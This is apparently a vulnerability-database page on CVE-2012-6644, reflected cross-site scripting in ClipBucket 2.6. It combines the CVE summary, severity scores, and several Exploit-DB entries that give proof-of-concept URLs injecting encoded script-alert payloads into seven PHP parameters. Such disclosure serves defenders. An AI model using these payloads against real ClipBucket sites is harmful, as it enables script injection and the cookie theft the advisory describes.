CVE-2012-6644
published 2014-04-08CVE-2012-6644: Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter…
PriorityP423medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
3.12%
86.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to channels.php, (2) collections.php, (3) groups.php, or (4) videos.php; (5) query parameter to search_result.php; or (6) type parameter to view_collection.php or (7) view_item.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clip-bucket | clipbucket | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Clip-bucket ClipBucket 2.6 channels.php Type cross site scripting (EDB-18341 / XFDB-72245)
vuldb·2026-05-10·CVSS 4.3
CVE-2012-6644 [MEDIUM] Clip-bucket ClipBucket 2.6 channels.php Type cross site scripting (EDB-18341 / XFDB-72245)
A vulnerability described as problematic has been identified in Clip-bucket ClipBucket 2.6. Affected is an unknown function of the file channels.php. Such manipulation of the argument Type leads to cross site scripting.
This vulnerability is referenced as CVE-2012-6644. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-4whx-q4g9-v3mj: Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2
ghsa_unreviewed·2022-05-17
CVE-2012-6644 [MEDIUM] CWE-79 GHSA-4whx-q4g9-v3mj: Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2
Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to channels.php, (2) collections.php, (3) groups.php, or (4) videos.php; (5) query parameter to search_result.php; or (6) type parameter to view_collection.php or (7) view_item.php.
No detection rules found.
Exploit-DB
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
Exploit-DB
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
Exploit-DB
Clipbucket 2.6 - Multiple Vulnerabilities
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - Multiple Vulnerabilities
Clipbucket 2.6 - Multiple Vulnerabilities
---
# Exploit : Multiple Vulnerability on ClipBucket 2.6
# Date : 09 January 2012
# Author : YaDoY666
# Website : http://yadoy666.serverisdown.org
# Software : Clip Bucket (Open Source Video Sharing)
# Version : 2.6
# Vendor : Clip Bucket (http://clip-bucket.com)
# Vendor Response : None
Cross Site Scripting
[[=]] http://[site]/[path]/channels.php
[[=]] http://[site]/[path]/collections.php
[[=]] http://[site]/[path]/groups.php
[[=]] http://[site]/[path]/search_result.php
[[=]] http://[site]/[path]/videos.php
[[=]] http://[site]/[path]/view_collection.php
[[=]] http://[site]/[path]/view_item.php
Example :
http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&s
Exploit-DB
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting
exploitdb·2012-01-09
CVE-2012-6644 Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
No writeups or analysis indexed.
http://osvdb.org/78193http://osvdb.org/78194http://osvdb.org/78195http://osvdb.org/78196http://osvdb.org/78197http://osvdb.org/78198http://osvdb.org/78199http://osvdb.org/78200http://packetstormsecurity.org/files/108489/clipbucket-sqlxss.txthttp://secunia.com/advisories/47474http://www.exploit-db.com/exploits/18341http://www.securityfocus.com/bid/51321https://exchange.xforce.ibmcloud.com/vulnerabilities/72245http://osvdb.org/78193http://osvdb.org/78194http://osvdb.org/78195http://osvdb.org/78196http://osvdb.org/78197http://osvdb.org/78198http://osvdb.org/78199http://osvdb.org/78200http://packetstormsecurity.org/files/108489/clipbucket-sqlxss.txthttp://secunia.com/advisories/47474http://www.exploit-db.com/exploits/18341http://www.securityfocus.com/bid/51321https://exchange.xforce.ibmcloud.com/vulnerabilities/72245
2014-04-08
Published